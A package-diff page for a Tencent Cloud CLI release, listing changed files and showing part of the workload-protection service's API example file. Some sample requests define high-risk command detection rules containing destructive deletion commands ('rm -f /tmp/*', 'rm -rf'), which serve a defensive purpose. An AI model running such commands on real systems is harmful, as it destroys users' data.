tccli 3.0.1216.1__py2.py3-none-any.whl → 3.0.1217.1__py2.py3-none-any.whl
Sign up to get free protection for your applications and to get access to all the features.
- tccli/__init__.py +1 -1
- tccli/argparser.py +1 -1
- tccli/command.py +2 -2
- tccli/credentials.py +25 -0
- tccli/main.py +6 -2
- tccli/plugins/sso/__init__.py +61 -0
- tccli/plugins/sso/configs.py +4 -0
- tccli/plugins/sso/configure.py +45 -0
- tccli/plugins/sso/login.py +144 -0
- tccli/plugins/sso/logout.py +21 -0
- tccli/plugins/sso/terminal.py +161 -0
- tccli/plugins/sso/texts.py +40 -0
- tccli/services/__init__.py +6 -0
- tccli/services/acp/v20220105/api.json +7 -7
- tccli/services/acp/v20220105/examples.json +2 -2
- tccli/services/aiart/v20221229/api.json +29 -29
- tccli/services/aiart/v20221229/examples.json +8 -8
- tccli/services/apigateway/v20180808/api.json +18 -17
- tccli/services/apigateway/v20180808/examples.json +12 -12
- tccli/services/apm/v20210622/api.json +98 -4
- tccli/services/asr/v20190614/api.json +18 -17
- tccli/services/asr/v20190614/examples.json +13 -13
- tccli/services/autoscaling/v20180419/api.json +371 -309
- tccli/services/autoscaling/v20180419/examples.json +17 -17
- tccli/services/batch/v20170312/api.json +7 -7
- tccli/services/bda/v20200324/api.json +39 -31
- tccli/services/bda/v20200324/examples.json +9 -9
- tccli/services/bh/__init__.py +4 -0
- tccli/services/bh/bh_client.py +3428 -0
- tccli/services/bh/v20230418/api.json +8180 -0
- tccli/services/bh/v20230418/examples.json +519 -0
- tccli/services/bi/v20220105/api.json +48 -0
- tccli/services/billing/v20180709/api.json +26 -24
- tccli/services/bsca/v20210811/api.json +1 -1
- tccli/services/btoe/v20210514/api.json +4 -4
- tccli/services/btoe/v20210514/examples.json +2 -2
- tccli/services/ca/v20230228/api.json +60 -0
- tccli/services/cam/v20190116/api.json +11 -11
- tccli/services/cat/v20180409/api.json +9 -0
- tccli/services/cbs/v20170312/api.json +200 -188
- tccli/services/cbs/v20170312/examples.json +4 -4
- tccli/services/ccc/v20200210/api.json +390 -323
- tccli/services/ccc/v20200210/examples.json +15 -15
- tccli/services/cdb/cdb_client.py +13 -13
- tccli/services/cdb/v20170320/api.json +295 -270
- tccli/services/cdb/v20170320/examples.json +38 -38
- tccli/services/cdc/v20201214/api.json +283 -270
- tccli/services/cdc/v20201214/examples.json +26 -26
- tccli/services/cds/v20180420/api.json +82 -76
- tccli/services/cds/v20180420/examples.json +1 -1
- tccli/services/cdwch/v20200915/api.json +1 -1
- tccli/services/cdwdoris/v20211228/api.json +42 -2
- tccli/services/cdz/v20221123/api.json +41 -5
- tccli/services/cfg/v20210820/api.json +31 -0
- tccli/services/cfs/v20190719/api.json +89 -1
- tccli/services/cfs/v20190719/examples.json +1 -1
- tccli/services/cfw/cfw_client.py +0 -53
- tccli/services/cfw/v20190904/api.json +1849 -1999
- tccli/services/cfw/v20190904/examples.json +157 -159
- tccli/services/ckafka/v20190819/api.json +104 -75
- tccli/services/clb/v20180317/api.json +48 -26
- tccli/services/clb/v20180317/examples.json +1 -1
- tccli/services/cloudapp/v20220530/api.json +5 -1
- tccli/services/cloudaudit/v20190319/api.json +58 -44
- tccli/services/cloudaudit/v20190319/examples.json +6 -6
- tccli/services/cloudstudio/v20230508/api.json +38 -37
- tccli/services/cloudstudio/v20230508/examples.json +4 -4
- tccli/services/cls/cls_client.py +216 -4
- tccli/services/cls/v20201016/api.json +536 -47
- tccli/services/cls/v20201016/examples.json +34 -2
- tccli/services/csip/v20221121/api.json +2562 -2382
- tccli/services/csip/v20221121/examples.json +108 -108
- tccli/services/cvm/v20170312/api.json +149 -112
- tccli/services/cvm/v20170312/examples.json +2 -2
- tccli/services/cwp/cwp_client.py +4 -110
- tccli/services/cwp/v20180228/api.json +6338 -6146
- tccli/services/cwp/v20180228/examples.json +342 -370
- tccli/services/cynosdb/v20190107/api.json +93 -81
- tccli/services/cynosdb/v20190107/examples.json +70 -70
- tccli/services/dasb/v20191018/api.json +796 -651
- tccli/services/dasb/v20191018/examples.json +101 -101
- tccli/services/dcdb/dcdb_client.py +114 -61
- tccli/services/dcdb/v20180411/api.json +141 -7
- tccli/services/dcdb/v20180411/examples.json +32 -0
- tccli/services/dlc/v20210125/api.json +21 -11
- tccli/services/dnspod/dnspod_client.py +417 -46
- tccli/services/dnspod/v20210323/api.json +751 -30
- tccli/services/dnspod/v20210323/examples.json +62 -0
- tccli/services/dts/v20211206/api.json +4 -4
- tccli/services/ecm/v20190719/api.json +2 -2
- tccli/services/emr/v20190103/api.json +339 -114
- tccli/services/emr/v20190103/examples.json +64 -82
- tccli/services/es/v20180416/api.json +29 -0
- tccli/services/es/v20180416/examples.json +1 -1
- tccli/services/ess/v20201111/api.json +49 -31
- tccli/services/ess/v20201111/examples.json +20 -8
- tccli/services/essbasic/v20210526/api.json +54 -49
- tccli/services/essbasic/v20210526/examples.json +36 -18
- tccli/services/facefusion/v20181201/api.json +47 -45
- tccli/services/facefusion/v20181201/examples.json +2 -2
- tccli/services/facefusion/v20220927/api.json +54 -48
- tccli/services/facefusion/v20220927/examples.json +5 -5
- tccli/services/faceid/v20180301/api.json +497 -496
- tccli/services/faceid/v20180301/examples.json +219 -101
- tccli/services/fmu/v20191213/api.json +59 -67
- tccli/services/fmu/v20191213/examples.json +22 -22
- tccli/services/ft/v20200304/api.json +53 -57
- tccli/services/ft/v20200304/examples.json +14 -14
- tccli/services/gme/v20180711/api.json +21 -11
- tccli/services/gme/v20180711/examples.json +1 -1
- tccli/services/hai/v20230812/api.json +116 -9
- tccli/services/hai/v20230812/examples.json +4 -4
- tccli/services/hunyuan/hunyuan_client.py +436 -12
- tccli/services/hunyuan/v20230901/api.json +1482 -118
- tccli/services/hunyuan/v20230901/examples.json +82 -18
- tccli/services/iai/v20180301/api.json +23 -19
- tccli/services/iai/v20180301/examples.json +2 -2
- tccli/services/iai/v20200303/api.json +530 -511
- tccli/services/iai/v20200303/examples.json +116 -86
- tccli/services/ig/__init__.py +4 -0
- tccli/services/ig/ig_client.py +195 -0
- tccli/services/ig/v20210518/api.json +83 -0
- tccli/services/ig/v20210518/examples.json +13 -0
- tccli/services/ioa/ioa_client.py +53 -0
- tccli/services/ioa/v20220601/api.json +662 -413
- tccli/services/ioa/v20220601/examples.json +24 -10
- tccli/services/iotexplorer/v20190423/api.json +33 -13
- tccli/services/iotexplorer/v20190423/examples.json +3 -3
- tccli/services/iotvideo/iotvideo_client.py +106 -0
- tccli/services/iotvideo/v20191126/api.json +256 -24
- tccli/services/iotvideo/v20191126/examples.json +19 -3
- tccli/services/iotvideo/v20201215/api.json +1 -1
- tccli/services/iotvideo/v20201215/examples.json +1 -1
- tccli/services/iotvideo/v20211125/api.json +1 -1
- tccli/services/iotvideo/v20211125/examples.json +2 -2
- tccli/services/iss/iss_client.py +69 -122
- tccli/services/iss/v20230517/api.json +10 -54
- tccli/services/iss/v20230517/examples.json +0 -14
- tccli/services/kms/v20190118/api.json +301 -268
- tccli/services/kms/v20190118/examples.json +45 -51
- tccli/services/lcic/lcic_client.py +159 -0
- tccli/services/lcic/v20220817/api.json +273 -1
- tccli/services/lcic/v20220817/examples.json +24 -0
- tccli/services/lighthouse/v20200324/api.json +56 -0
- tccli/services/live/live_client.py +159 -0
- tccli/services/live/v20180801/api.json +244 -0
- tccli/services/live/v20180801/examples.json +24 -0
- tccli/services/lke/v20231130/api.json +17 -17
- tccli/services/lke/v20231130/examples.json +19 -25
- tccli/services/mariadb/v20170312/api.json +7 -7
- tccli/services/market/v20191010/api.json +3 -3
- tccli/services/market/v20191010/examples.json +2 -2
- tccli/services/mmps/v20200710/api.json +47 -47
- tccli/services/mmps/v20200710/examples.json +3 -3
- tccli/services/mongodb/v20190725/api.json +4 -4
- tccli/services/monitor/v20180724/api.json +46 -19
- tccli/services/mps/v20190612/api.json +282 -5
- tccli/services/mps/v20190612/examples.json +25 -1
- tccli/services/mqtt/v20240516/api.json +2 -2
- tccli/services/mrs/v20200910/api.json +72 -34
- tccli/services/mrs/v20200910/examples.json +2 -2
- tccli/services/ms/v20180408/api.json +535 -506
- tccli/services/ms/v20180408/examples.json +25 -25
- tccli/services/oceanus/v20190422/api.json +130 -0
- tccli/services/ocr/ocr_client.py +232 -20
- tccli/services/ocr/v20181119/api.json +2265 -760
- tccli/services/ocr/v20181119/examples.json +200 -180
- tccli/services/omics/v20221128/api.json +614 -553
- tccli/services/omics/v20221128/examples.json +9 -9
- tccli/services/organization/v20210331/api.json +13 -4
- tccli/services/organization/v20210331/examples.json +2 -2
- tccli/services/partners/v20180321/api.json +244 -234
- tccli/services/partners/v20180321/examples.json +19 -19
- tccli/services/privatedns/privatedns_client.py +428 -4
- tccli/services/privatedns/v20201028/api.json +815 -11
- tccli/services/privatedns/v20201028/examples.json +64 -0
- tccli/services/pts/v20210728/api.json +18 -0
- tccli/services/pts/v20210728/examples.json +1 -1
- tccli/services/rce/rce_client.py +53 -0
- tccli/services/rce/v20201103/api.json +146 -0
- tccli/services/rce/v20201103/examples.json +8 -0
- tccli/services/redis/v20180412/api.json +42 -42
- tccli/services/redis/v20180412/examples.json +19 -19
- tccli/services/rum/v20210622/api.json +9 -0
- tccli/services/scf/v20180416/api.json +15 -15
- tccli/services/scf/v20180416/examples.json +1 -1
- tccli/services/smop/v20201203/api.json +46 -42
- tccli/services/smop/v20201203/examples.json +2 -2
- tccli/services/soe/v20180724/api.json +10 -10
- tccli/services/sqlserver/v20180328/api.json +21 -8
- tccli/services/sqlserver/v20180328/examples.json +5 -5
- tccli/services/ssl/v20191205/api.json +97 -4
- tccli/services/ssm/v20190923/api.json +292 -231
- tccli/services/ssm/v20190923/examples.json +42 -42
- tccli/services/tat/v20201028/api.json +97 -97
- tccli/services/tat/v20201028/examples.json +20 -26
- tccli/services/tchd/v20230306/api.json +5 -5
- tccli/services/tchd/v20230306/examples.json +3 -3
- tccli/services/tcr/v20190924/api.json +1 -1
- tccli/services/tcr/v20190924/examples.json +1 -1
- tccli/services/tcss/v20201101/api.json +1973 -1426
- tccli/services/tcss/v20201101/examples.json +346 -364
- tccli/services/tdmq/v20200217/api.json +539 -401
- tccli/services/tdmq/v20200217/examples.json +104 -104
- tccli/services/tds/v20220801/api.json +4 -4
- tccli/services/tem/v20210701/api.json +287 -271
- tccli/services/tem/v20210701/examples.json +59 -59
- tccli/services/teo/v20220901/api.json +37 -9
- tccli/services/teo/v20220901/examples.json +13 -7
- tccli/services/thpc/v20230321/api.json +5 -5
- tccli/services/tke/tke_client.py +217 -58
- tccli/services/tke/v20180525/api.json +36 -27
- tccli/services/tke/v20180525/examples.json +1 -1
- tccli/services/tke/v20220501/api.json +176 -0
- tccli/services/tke/v20220501/examples.json +24 -0
- tccli/services/tmt/v20180321/api.json +38 -8
- tccli/services/trp/v20210515/api.json +86 -74
- tccli/services/trp/v20210515/examples.json +65 -65
- tccli/services/trro/v20220325/api.json +72 -71
- tccli/services/trro/v20220325/examples.json +8 -8
- tccli/services/trtc/trtc_client.py +8 -61
- tccli/services/trtc/v20190722/api.json +72 -30
- tccli/services/trtc/v20190722/examples.json +3 -11
- tccli/services/tse/tse_client.py +110 -4
- tccli/services/tse/v20201207/api.json +122 -7
- tccli/services/tse/v20201207/examples.json +25 -9
- tccli/services/vclm/v20240523/api.json +225 -82
- tccli/services/vclm/v20240523/examples.json +13 -19
- tccli/services/vod/v20180717/api.json +431 -4
- tccli/services/vod/v20180717/examples.json +25 -5
- tccli/services/vod/v20240718/api.json +11 -11
- tccli/services/vod/v20240718/examples.json +4 -4
- tccli/services/vod/vod_client.py +53 -0
- tccli/services/vpc/v20170312/api.json +1090 -862
- tccli/services/vpc/v20170312/examples.json +74 -66
- tccli/services/vpc/vpc_client.py +61 -8
- tccli/services/waf/v20180125/api.json +2540 -2177
- tccli/services/waf/v20180125/examples.json +216 -284
- tccli/services/waf/waf_client.py +172 -119
- tccli/services/wav/v20210129/api.json +48 -48
- tccli/services/wav/v20210129/examples.json +4 -4
- tccli/services/wedata/v20210820/api.json +909 -25
- tccli/services/wedata/v20210820/examples.json +28 -4
- tccli/services/wedata/wedata_client.py +159 -0
- tccli/services/weilingwith/v20230427/api.json +6 -6
- tccli/services/weilingwith/v20230427/examples.json +3 -3
- tccli/sso.py +229 -0
- {tccli-3.0.1216.1.dist-info → tccli-3.0.1217.1.dist-info}/METADATA +2 -2
- {tccli-3.0.1216.1.dist-info → tccli-3.0.1217.1.dist-info}/RECORD +252 -235
- {tccli-3.0.1216.1.dist-info → tccli-3.0.1217.1.dist-info}/WHEEL +0 -0
- {tccli-3.0.1216.1.dist-info → tccli-3.0.1217.1.dist-info}/entry_points.txt +0 -0
- {tccli-3.0.1216.1.dist-info → tccli-3.0.1217.1.dist-info}/license_files/LICENSE +0 -0
@@ -35,15 +35,9 @@
|
|
35
35
|
"CheckBashPolicyParams": [
|
36
36
|
{
|
37
37
|
"document": "",
|
38
|
-
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: CheckBashPolicyParams\n<公共请求参数>\n\n{\n \"Rules\": {\n \"Process\": \"
|
38
|
+
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: CheckBashPolicyParams\n<公共请求参数>\n\n{\n \"CheckField\": \"Name,Process\",\n \"EventId\": 1098230,\n \"Name\": \"mapleaa\",\n \"Rule\": \"rm -f /tmp/*\",\n \"Id\": 1320,\n \"Rules\": {\n \"Process\": {\n \"Exe\": \"/tmp/test\",\n \"Cmdline\": \"/tmp/test\"\n },\n \"PProcess\": {\n \"Exe\": \"/tmp/test\",\n \"Cmdline\": \"/tmp/test\"\n },\n \"AProcess\": {\n \"Exe\": \"/tmp/test\",\n \"Cmdline\": \"/tmp/test\"\n }\n }\n}",
|
39
39
|
"output": "{\n \"Response\": {\n \"RequestId\": \"d92d723e-4aac-4f4a-bbf9-e5430e29d289\",\n \"ErrCode\": 2,\n \"ErrMsg\": \"正则表达式与命令内容不匹配\"\n }\n}",
|
40
40
|
"title": "示例"
|
41
|
-
},
|
42
|
-
{
|
43
|
-
"document": "",
|
44
|
-
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: CheckBashPolicyParams\n<公共请求参数>\n\n{\n \"Name\": \"testbash\",\n \"CheckField\": \"Name\"\n}",
|
45
|
-
"output": "{\n \"Response\": {\n \"ErrCode\": 1,\n \"ErrMsg\": \"规则名称已存在\",\n \"RequestId\": \"6d9bb665-aa04-499f-93d8-1210e8d59835\"\n }\n}",
|
46
|
-
"title": "校验名字"
|
47
41
|
}
|
48
42
|
],
|
49
43
|
"CheckBashRuleParams": [
|
@@ -51,13 +45,13 @@
|
|
51
45
|
"document": "",
|
52
46
|
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: CheckBashRuleParams\n<公共请求参数>\n\n{\n \"Rule\": \"rm -rf /tmp/tmp\\\\.ERYbwgd8e9\",\n \"Name\": \"mapleaa\",\n \"EventId\": 1098230,\n \"CheckField\": \"Name,Rule\"\n}",
|
53
47
|
"output": "{\n \"Response\": {\n \"RequestId\": \"d92d723e-4aac-4f4a-bbf9-e5430e29d289\",\n \"ErrCode\": 2,\n \"ErrMsg\": \"正则表达式与命令内容不匹配\"\n }\n}",
|
54
|
-
"title": "
|
48
|
+
"title": "检验高危命令规则"
|
55
49
|
}
|
56
50
|
],
|
57
51
|
"CheckFileTamperRule": [
|
58
52
|
{
|
59
53
|
"document": "",
|
60
|
-
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: CheckFileTamperRule\n<公共请求参数>\n\n{\n \"Name\": \"
|
54
|
+
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: CheckFileTamperRule\n<公共请求参数>\n\n{\n \"Name\": \"rule2\",\n \"Id\": 1\n}",
|
61
55
|
"output": "{\n \"Response\": {\n \"RequestId\": \"d92d723e-4aac-4f4a-bbf9-e5430e29d289\",\n \"ErrCode\": 1,\n \"ErrMsg\": \"规则名称已存在\"\n }\n}",
|
62
56
|
"title": "示例"
|
63
57
|
}
|
@@ -73,7 +67,7 @@
|
|
73
67
|
"CheckLogKafkaConnectionState": [
|
74
68
|
{
|
75
69
|
"document": "",
|
76
|
-
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: CheckLogKafkaConnectionState\n<公共请求参数>\n\n{\n \"AccessType\": 1,\n \"AccessAddr\": \"192.168.1.1:80\",\n \"Username\": \"
|
70
|
+
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: CheckLogKafkaConnectionState\n<公共请求参数>\n\n{\n \"AccessType\": 1,\n \"AccessAddr\": \"192.168.1.1:80\",\n \"Username\": \"uname\",\n \"HasPwd\": 1,\n \"Pwd\": \"pwdpwd\",\n \"KafkaId\": \"ckafka-ce80kte5\",\n \"InsVersion\": \"0.10.2.1\"\n}",
|
77
71
|
"output": "{\n \"Response\": {\n \"RequestId\": \"bf93077b-51f5-4428-b9de-7e33a0b9cc4a\",\n \"IsConnect\": true\n }\n}",
|
78
72
|
"title": "检查日志投递kafka连通性"
|
79
73
|
}
|
@@ -97,8 +91,8 @@
|
|
97
91
|
"CreateBaselineStrategy": [
|
98
92
|
{
|
99
93
|
"document": "根据基线信息创建基线策略",
|
100
|
-
"input": "https://cwp.tencentcloudapi.com/?Action=CreateBaselineStrategy\n&StrategyName=
|
101
|
-
"output": "{\n \"Response\": {\n \"RequestId\": \"
|
94
|
+
"input": "https://cwp.tencentcloudapi.com/?Action=CreateBaselineStrategy\n&StrategyName=istrategy\n&ScanCycle=1\n&ScanAt=00:00:00\n&CategoryIds.0=1\n&IsGlobal=1\n&MachineType=CVM\n&RegionCode=ab-bj\n&Quuids.0=\"657f3c29-4bc9-4c48-a8d6-de5bd14ffc67\"\n&<公共请求参数>",
|
95
|
+
"output": "{\n \"Response\": {\n \"RequestId\": \"657f3c29-4bc9-4c48-a8d6-de5bd14ffc67\"\n }\n}",
|
102
96
|
"title": "创建基线策略"
|
103
97
|
}
|
104
98
|
],
|
@@ -110,14 +104,6 @@
|
|
110
104
|
"title": "示例"
|
111
105
|
}
|
112
106
|
],
|
113
|
-
"CreateCloudProtectServiceOrderRecord": [
|
114
|
-
{
|
115
|
-
"document": "云护航服务使用完成后,确认收货,后续隐藏服务订单",
|
116
|
-
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: CreateCloudProtectServiceOrderRecord\n<公共请求参数>\n\n{\n \"ResourceIds\": [\n \"cwpesc-xxxxxxxx\"\n ]\n}",
|
117
|
-
"output": "{\n \"Response\": {\n \"RequestId\": \"6664048c-808a-1f57-2187-4553f4157426\",\n \"Success\": [\n \"cwpesc-xxxxxxxx\"\n ]\n }\n}",
|
118
|
-
"title": "确认收货"
|
119
|
-
}
|
120
|
-
],
|
121
107
|
"CreateEmergencyVulScan": [
|
122
108
|
{
|
123
109
|
"document": "漏洞管理 - 应急漏洞检测",
|
@@ -129,7 +115,7 @@
|
|
129
115
|
"CreateIncidentBacktracking": [
|
130
116
|
{
|
131
117
|
"document": "针对单个旗舰版机器触发事件调查回溯",
|
132
|
-
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: CreateIncidentBacktracking\n<公共请求参数>\n\n{\n \"Quuid\": \"
|
118
|
+
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: CreateIncidentBacktracking\n<公共请求参数>\n\n{\n \"Quuid\": \"acdd5474-6360-4fd4-bfc7-843162cb8116\"\n}",
|
133
119
|
"output": "{\n \"Response\": {\n \"RequestId\": \"6235953e-b769-4f3a-aed8-b6572f8172cf\"\n }\n}",
|
134
120
|
"title": "触发事件调查回溯"
|
135
121
|
}
|
@@ -138,14 +124,14 @@
|
|
138
124
|
{
|
139
125
|
"document": "",
|
140
126
|
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: CreateLicenseOrder\n<公共请求参数>\n\n{}",
|
141
|
-
"output": "{\n \"Response\": {\n \"DealNames\": [\n \"订单号
|
127
|
+
"output": "{\n \"Response\": {\n \"DealNames\": [\n \"订单号no\"\n ],\n \"RequestId\": \"1bb6cbfb-572d-4f29-b6e0-017acd8659f0\",\n \"ResourceIds\": [\n \"资源ID\"\n ],\n \"BigDealId\": \"大订单号no\"\n }\n}",
|
142
128
|
"title": "示例"
|
143
129
|
}
|
144
130
|
],
|
145
131
|
"CreateLogExport": [
|
146
132
|
{
|
147
133
|
"document": "",
|
148
|
-
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: CreateLogExport\n<公共请求参数>\n\n{\n \"Sort\": \"desc\",\n \"Count\": \"500\",\n \"Format\": \"json\",\n \"QueryString\": \"
|
134
|
+
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: CreateLogExport\n<公共请求参数>\n\n{\n \"Sort\": \"desc\",\n \"Count\": \"500\",\n \"Format\": \"json\",\n \"QueryString\": \"dev\",\n \"StartTime\": \"1656640800000\",\n \"EndTime\": \"1656641100000\"\n}",
|
149
135
|
"output": "{\n \"Response\": {\n \"ExportId\": \"export-dd7e975d-2ea0-4c3b-aad9-767c4beaafd5\",\n \"RequestId\": \"39715990-4996-447a-88c8-dc02034fb278\"\n }\n}",
|
150
136
|
"title": "示例"
|
151
137
|
}
|
@@ -161,7 +147,7 @@
|
|
161
147
|
"CreateMalwareWhiteList": [
|
162
148
|
{
|
163
149
|
"document": "",
|
164
|
-
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: CreateMalwareWhiteList\n<公共请求参数>\n\n{\n \"QuuidList\": [\n \"
|
150
|
+
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: CreateMalwareWhiteList\n<公共请求参数>\n\n{\n \"QuuidList\": [\n \"acdd5474-6360-4fd4-bfc7-843162cb8116\"\n ],\n \"IsGlobal\": 1,\n \"Mode\": 1,\n \"MatchType\": 1,\n \"FileName\": [\n \"index.html\"\n ],\n \"FileDirectory\": [\n \"/var/www\"\n ],\n \"FileExtension\": [\n \"php\"\n ],\n \"Md5List\": [\n \"e10adc3949ba59abbe56e057f20f883e\"\n ],\n \"EventId\": 1\n}",
|
165
151
|
"output": "{\n \"Response\": {\n \"RequestId\": \"be6f6eec-0825-4e67-ab9a-c8568bbf736c\"\n }\n}",
|
166
152
|
"title": "创建木马白名单"
|
167
153
|
}
|
@@ -185,7 +171,7 @@
|
|
185
171
|
"CreateRansomDefenseStrategy": [
|
186
172
|
{
|
187
173
|
"document": "",
|
188
|
-
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: CreateRansomDefenseStrategy\n<公共请求参数>\n\n{\n \"Status\": 1,\n \"ExcludeDir\": \"/tmp;/var/log\",\n \"Description\": \"策略备注\",\n \"Hour\": \"00:00;11:00;15:00\",\n \"BackupType\": 1,\n \"IncludeDir\": \"/root;/data\",\n \"Weekday\": \"1;2;3\",\n \"IsAll\": 1,\n \"Id\": 1,\n \"SaveDay\": 1,\n \"Name\": \"
|
174
|
+
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: CreateRansomDefenseStrategy\n<公共请求参数>\n\n{\n \"Status\": 1,\n \"ExcludeDir\": \"/tmp;/var/log\",\n \"Description\": \"策略备注\",\n \"Hour\": \"00:00;11:00;15:00\",\n \"BackupType\": 1,\n \"IncludeDir\": \"/root;/data\",\n \"Weekday\": \"1;2;3\",\n \"IsAll\": 1,\n \"Id\": 1,\n \"SaveDay\": 1,\n \"Name\": \"ada_api****\"\n}",
|
189
175
|
"output": "{\n \"Response\": {\n \"RequestId\": \"1703764f-b3ea-4d7f-99cb-cc3a6a62e2ec\"\n }\n}",
|
190
176
|
"title": "创建或修改防勒索策略"
|
191
177
|
}
|
@@ -226,14 +212,14 @@
|
|
226
212
|
{
|
227
213
|
"document": "创建试用订单",
|
228
214
|
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: CreateWhiteListOrder\n<公共请求参数>\n\n{\n \"LicenseType\": 1,\n \"LicenseNum\": 10,\n \"Deadline\": 10,\n \"SourceType\": 1,\n \"RuleName\": \"asset_center\"\n}",
|
229
|
-
"output": "{\n \"Response\": {\n \"RequestId\": \"
|
215
|
+
"output": "{\n \"Response\": {\n \"RequestId\": \"d1245804-b922-4c3b-8499-f95dce26b33c\",\n \"Resource\": {\n \"Id\": 1,\n \"ResourceId\": \"white_2415**\",\n \"BeginTime\": \"2022-05-31 00:00:00\",\n \"EndTime\": \"2022-06-10 00:00:00\",\n \"LicenseType\": 1\n }\n }\n}",
|
230
216
|
"title": "示例"
|
231
217
|
}
|
232
218
|
],
|
233
219
|
"DeleteAllJavaMemShells": [
|
234
220
|
{
|
235
221
|
"document": "",
|
236
|
-
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: DeleteAllJavaMemShells\n<公共请求参数>\n\n{}",
|
222
|
+
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: DeleteAllJavaMemShells\n<公共请求参数>\n\n{\n \"Quuid\": \"5a540076-d38a-4078-aa98-e7c86371d322\"\n}",
|
237
223
|
"output": "{\n \"Response\": {\n \"RequestId\": \"d92d723e-4aac-4f4a-bbf9-e5430e29d289\"\n }\n}",
|
238
224
|
"title": "删除全部java内存马事件"
|
239
225
|
}
|
@@ -289,7 +275,7 @@
|
|
289
275
|
"DeleteBashEvents": [
|
290
276
|
{
|
291
277
|
"document": "删除高危命令事件",
|
292
|
-
"input": "
|
278
|
+
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: DeleteBashEvents\n<公共请求参数>\n\n{\n \"Ids\": [\n 1002\n ],\n \"All\": true\n}",
|
293
279
|
"output": "{\n \"Response\": {\n \"RequestId\": \"354f4ac3-8546-4516-8c8a-69e3ab73aa8a\"\n }\n}",
|
294
280
|
"title": "删除高危命令事件"
|
295
281
|
}
|
@@ -321,7 +307,7 @@
|
|
321
307
|
"DeleteLicenseRecord": [
|
322
308
|
{
|
323
309
|
"document": "",
|
324
|
-
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: DeleteLicenseRecord\n<公共请求参数>\n\n{\n \"LicenseId\": 1,\n \"LicenseType\": 0,\n \"ResourceId\": \"
|
310
|
+
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: DeleteLicenseRecord\n<公共请求参数>\n\n{\n \"LicenseId\": 1,\n \"LicenseType\": 0,\n \"ResourceId\": \"553c4af8b025\"\n}",
|
325
311
|
"output": "{\n \"Response\": {\n \"RequestId\": \"7f877b6e-f1d8-4a99-887c-3479bb086ee7\"\n }\n}",
|
326
312
|
"title": "示例"
|
327
313
|
}
|
@@ -385,7 +371,7 @@
|
|
385
371
|
"DeleteMaliciousRequests": [
|
386
372
|
{
|
387
373
|
"document": "删除恶意请求记录。",
|
388
|
-
"input": "
|
374
|
+
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: DeleteMaliciousRequests\n<公共请求参数>\n\n{\n \"Ids\": [\n 1002\n ],\n \"All\": true\n}",
|
389
375
|
"output": "{\n \"Response\": {\n \"RequestId\": \"354f4ac3-8546-4516-8c8a-69e3ab73aa8a\"\n }\n}",
|
390
376
|
"title": "删除恶意请求记录"
|
391
377
|
}
|
@@ -394,7 +380,7 @@
|
|
394
380
|
{
|
395
381
|
"document": "",
|
396
382
|
"input": "https://cwp.tencentcloudapi.com/?Action=DeleteMalwareScanTask\n&<公共请求参数>",
|
397
|
-
"output": "{\n \"Response\": {\n \"RequestId\": \"
|
383
|
+
"output": "{\n \"Response\": {\n \"RequestId\": \"a9fe0359-04d9-417f-ab6d-4941891d6c4b\"\n }\n}",
|
398
384
|
"title": "终止一键扫描"
|
399
385
|
}
|
400
386
|
],
|
@@ -425,7 +411,7 @@
|
|
425
411
|
"DeleteNonlocalLoginPlaces": [
|
426
412
|
{
|
427
413
|
"document": "本接口 (DeleteNonlocalLoginPlaces) 用于删除异地登录记录。",
|
428
|
-
"input": "https://cwp.tencentcloudapi.com/?Action=DeleteNonlocalLoginPlaces\n&DelType=Id\n&Ids.0=
|
414
|
+
"input": "https://cwp.tencentcloudapi.com/?Action=DeleteNonlocalLoginPlaces\n&DelType=Id\n&Ids.0=1\n&Ids.1=2\n&<公共请求参数> \n\n{\"DelType\":\"Ip\", \"Ids\":\"1.1.1.1\"}",
|
429
415
|
"output": "{\n \"Response\": {\n \"RequestId\": \"354f4ac3-8546-4516-8c8a-69e3ab73aa8a\"\n }\n}",
|
430
416
|
"title": "删除异地登录记录"
|
431
417
|
}
|
@@ -473,7 +459,7 @@
|
|
473
459
|
"DeleteRiskDnsEvent": [
|
474
460
|
{
|
475
461
|
"document": "",
|
476
|
-
